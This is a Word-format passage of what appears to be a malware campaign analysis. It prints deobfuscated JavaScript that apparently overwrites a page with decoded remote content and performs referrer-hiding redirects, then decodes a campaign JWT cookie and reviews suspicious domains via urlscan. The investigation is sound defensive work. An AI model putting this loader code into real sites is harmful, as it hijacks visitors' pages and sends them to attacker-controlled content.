    <w:p w14:paraId="74BF5E30" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">                    for (var r in e = arguments[n]) Object.prototype.hasOwnProperty.call(e, r) &amp;&amp; (t[r] = e[r]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8D4DE6" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">                return t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F25124" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">            }).apply(this, arguments)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021F8ACE" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1CA135" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        r = this &amp;&amp; this.__importDefault || function(t) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586133B7" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">            return t &amp;&amp; t.__esModule ? t : {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2409CC92" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">                default: t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F9D5C2" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598A2959" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24612C2D" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">    Object.defineProperty(e, "__esModule", {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE882F4" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        value: !0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F4A4DA" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">    });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6533B5" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">    var i = r(n(1)),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317D91FA" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        c = (u.prototype.getSubId = function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3955FAE3" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            return this.config.subid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3286B2DA" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        }, u.prototype.getPath = function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74882D9C" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">            return this.config.P_PATH || ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274AA067" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        }, u.prototype.useStream = function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F84417" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">            return this.config.stream || !1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73591ACB" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        }, u.prototype.changeContent = function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C65C213" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">            i.default(this.config)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D33523" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        }, u.prototype.debugMode = function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAA3837" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">            this.config.debug &amp;&amp; this.clearStorage()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103B47D0" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        }, u.prototype.saveConfig = function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3EA205" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">            !this.config.debug &amp;&amp; this.config.unique &amp;&amp; (localStorage.setItem("subId", this.config.subid), void 0 !== this.config.token &amp;&amp; localStorage.setItem("token", this.config.token), localStorage.setItem("config", JSON.stringify(this.config)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DA8124" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        }, u.prototype.getInitParams = function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37992E6D" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">            window._P4SskFQV6wKbMxfB &amp;&amp; (this.config = o(o({}, this.config), window._P4SskFQV6wKbMxfB), this.config.debug &amp;&amp; this.debugMode()), this.config.created_at = Math.round(new Date / 1e3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A96D841" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">            var t = localStorage.getItem("config");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F2E21F" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">            null != t &amp;&amp; (this.config = JSON.parse(t))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD9950F" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        }, u.prototype.clearStorage = function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0538131B" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">            localStorage.removeItem("subId"), localStorage.removeItem("token"), localStorage.removeItem("config")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53419E31" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        }, u);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175E9E29" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767"/>
    <w:p w14:paraId="23E65500" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">    function u(t) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5657AD20" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        this.config = t, this.getInitParams(), this.saveConfig(), this.changeContent()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C999371" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABA48B1" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">    e.Client = c;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478384D8" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">    e.client = new c({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8C2471" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        subid: "3154ba7btkom",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5ED1F3" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        token: "",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A93B61" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        content: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4157EBDA" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">            "body": "",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FFEE73" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">            "headers": [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496B8CF7" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">            "status": 200,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0BBBBE" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">            "contentType": "",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632E43F5" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">            "uniqueness_cookie": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wiY2FtcGFpZ25zXCI6e1wiM1wiOjE2MzEyMTUzNTV9LFwidGltZVwiOjE2MzEyMTUzNTV9In0.z2qjBQsHYV-iXM874UMvGMHgHSsMJ6pCo7anohGj9HM",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F20957" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">            "cookies_ttl": 24,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605D0155" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">            "cookies": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B08F298" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">                "_subid": "3154ba7btkom",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514F98EB" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                "f6aba": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wiY2FtcGFpZ25zXCI6e1wiM1wiOjE2MzEyMTUzNTV9LFwidGltZVwiOjE2MzEyMTUzNTV9In0.z2qjBQsHYV-iXM874UMvGMHgHSsMJ6pCo7anohGj9HM"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AA5831" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2306546D" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E1A08E" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        debug: false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED941F4" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">    })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC3E35E" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t>}, function(t, e, n) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F649B0" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">    "use strict";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B75DC26" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">    Object.defineProperty(e, "__esModule", {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038B7746" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186B6743" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        value: !0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B653CF8" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">    });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E0E8D0" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">    e.default = function(t) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40502AA3" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        if (void 0 !== t.content) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E807618" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">            if (200 === t.content.status &amp;&amp; "" !== t.content.body) return document.open(), document.write((n = t.content.body, decodeURIComponent(atob(n).split("").map(function(t) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013F707B" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">                return "%" + ("00" + t.charCodeAt(0).toString(16)).slice(-2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CAD886" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">            }).join("")))), void document.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E19592" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">            if (301 === t.content.status || 302 === t.content.status) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A340862" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">                var e = t.content.headers[0].replace("Location: ", "");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69328BAA" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">                return document.open(), document.write("&lt;html&gt;&lt;head&gt;"), document.write('&lt;meta name="referrer" content="never" /&gt;'), document.write('&lt;meta http-equiv="refresh" content="0;url=' + e + '" /&gt;'), document.write("&lt;/head&gt;&lt;/html&gt;"), void document.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5324E075" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C3D154" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4261C7" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        var n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CADD619" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA38A48" w14:textId="13FB6FE0" w:rsidR="000D4640" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t>}]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407B6988" w14:textId="598C657D" w:rsidR="000D4640" w:rsidRDefault="000D4640"/>
    <w:p w14:paraId="7A1E5981" w14:textId="77777777" w:rsidR="000D4640" w:rsidRDefault="000D4640"/>
    <w:p w14:paraId="01A54322" w14:textId="3E7A886D" w:rsidR="003F0BF7" w:rsidRDefault="00FA1767">
      <w:r>
        <w:t>------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744EAD44" w14:textId="2FFFA258" w:rsidR="003F0BF7" w:rsidRDefault="003F0BF7"/>
    <w:p w14:paraId="7D03C5C2" w14:textId="6AD62237" w:rsidR="00FA1767" w:rsidRDefault="00FA1767">
      <w:r>
        <w:t>Two identical sections are encoded we need to decode them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3831A5E7" w14:textId="03B81033" w:rsidR="00FA1767" w:rsidRDefault="00FA1767"/>
    <w:p w14:paraId="475232B8" w14:textId="1C9BF96D" w:rsidR="00FA1767" w:rsidRDefault="00FA1767">
      <w:r w:rsidRPr="00FA1767">
        <w:t>eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wiY2FtcGFpZ25zXCI6e1wiM1wiOjE2MzEyMTUzNTV9LFwidGltZVwiOjE2MzEyMTUzNTV9In0.z2qjBQsHYV-iXM874UMvGMHgHSsMJ6pCo7anohGj9HM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F2D905" w14:textId="33EB77D1" w:rsidR="00FA1767" w:rsidRDefault="00FA1767"/>
    <w:p w14:paraId="6B604CB0" w14:textId="07C92017" w:rsidR="00FA1767" w:rsidRDefault="00FA1767">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49E0B56C" wp14:editId="4876EE9C">
            <wp:extent cx="5943600" cy="2930525"/>
            <wp:effectExtent l="12700" t="12700" r="12700" b="15875"/>
            <wp:docPr id="18" name="Picture 1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application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05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30DCE3" w14:textId="1296D64C" w:rsidR="00FA1767" w:rsidRDefault="00FA1767"/>
    <w:p w14:paraId="3FA7CF51" w14:textId="45ED1166" w:rsidR="00FA1767" w:rsidRDefault="00FA1767">
      <w:r w:rsidRPr="00FA1767">
        <w:t>{"typ":"JWT","alg":"HS256"}{"data":"{\"campaigns\":{\"3\":1631215355},\"time\":1631215355}"}3Ú¨ÁBÁØWè3ÎøPËÆ0xJÃ</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA1767">
        <w:tab/>
        <w:t>ê¨í©èhý</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C14D59" w14:textId="3CC11A43" w:rsidR="00FA1767" w:rsidRDefault="00FA1767"/>
    <w:p w14:paraId="57194864" w14:textId="2FDB6F57" w:rsidR="00FA1767" w:rsidRDefault="00FA1767">
      <w:r>
        <w:t>We can see it is part of a campaign</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104B1F25" w14:textId="2CF68D4F" w:rsidR="00FA1767" w:rsidRDefault="00FA1767">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F42D330" w14:textId="51ACA949" w:rsidR="00FA1767" w:rsidRDefault="00FA1767"/>
    <w:p w14:paraId="413B8B39" w14:textId="34008FB7" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="210" w:line="704" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Let us now examine </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA1767">
        <w:t>cuacuoncaocap</w:t>
      </w:r>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA1767">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA1767">
        <w:t>biz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E72EFB" w14:textId="7C20ADB9" w:rsidR="00FA1767" w:rsidRDefault="00067395">
      <w:hyperlink r:id="rId40" w:anchor="summary" w:history="1">
        <w:r w:rsidR="00FA1767" w:rsidRPr="007018B3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://urlscan.io/result/17d64db1-5f88-4aa0-a97f-a4c6a491939f/#summary</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4C75D938" w14:textId="0CB58D9E" w:rsidR="00FA1767" w:rsidRDefault="00FA1767"/>
    <w:p w14:paraId="2C06A02B" w14:textId="6FBD7BDB" w:rsidR="00FA1767" w:rsidRDefault="00FA1767">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EFF63D3" wp14:editId="1D0502E0">
            <wp:extent cx="5943600" cy="3335020"/>
            <wp:effectExtent l="12700" t="12700" r="12700" b="17780"/>
            <wp:docPr id="19" name="Picture 19" descr="Graphical user interface, application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, website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45754C" w14:textId="5670A9E5" w:rsidR="00FA1767" w:rsidRDefault="00FA1767"/>
    <w:p w14:paraId="3B329580" w14:textId="591736D9" w:rsidR="00FA1767" w:rsidRDefault="00067395">
      <w:hyperlink r:id="rId42" w:anchor="transactions" w:history="1">
        <w:r w:rsidR="00FA1767" w:rsidRPr="007018B3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://urlscan.io/result/17d64db1-5f88-4aa0-a97f-a4c6a491939f/#transactions</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5F8A4094" w14:textId="6A9FFADF" w:rsidR="00FA1767" w:rsidRDefault="00FA1767"/>
    <w:p w14:paraId="16682743" w14:textId="11F8D0D3" w:rsidR="00FA1767" w:rsidRDefault="00FA1767">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="116FF384" wp14:editId="5650F6C4">
            <wp:extent cx="5943600" cy="3900170"/>
            <wp:effectExtent l="12700" t="12700" r="12700" b="11430"/>
            <wp:docPr id="20" name="Picture 20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Graphical user interface, text, application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0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500617" w14:textId="78069A43" w:rsidR="00FA1767" w:rsidRDefault="00FA1767"/>
    <w:p w14:paraId="3058EA90" w14:textId="31AC7F48" w:rsidR="00FA1767" w:rsidRDefault="00FA1767">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="419BCC04" wp14:editId="55185B00">
            <wp:extent cx="5943600" cy="3476625"/>
            <wp:effectExtent l="12700" t="12700" r="12700" b="15875"/>
            <wp:docPr id="21" name="Picture 21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, text, application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D87C91" w14:textId="73CBF5CF" w:rsidR="00FA1767" w:rsidRDefault="00FA1767"/>
    <w:p w14:paraId="72A1F17E" w14:textId="103F83FC" w:rsidR="00FA1767" w:rsidRDefault="00FA1767">
      <w:r>
        <w:t>At the bottom are two failed request that need to be decoded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB706AD" w14:textId="5B881A86" w:rsidR="00FA1767" w:rsidRDefault="00FA1767"/>
    <w:p w14:paraId="69EAF627" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F2323F" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00067395" w:rsidP="00FA1767">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId45" w:history="1">
        <w:r w:rsidR="00FA1767">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
            <w:color w:val="18BC9C"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
          </w:rPr>
          <w:t>pdflive.org</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="677E934B" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:ind w:left="2700"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE5A08C" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
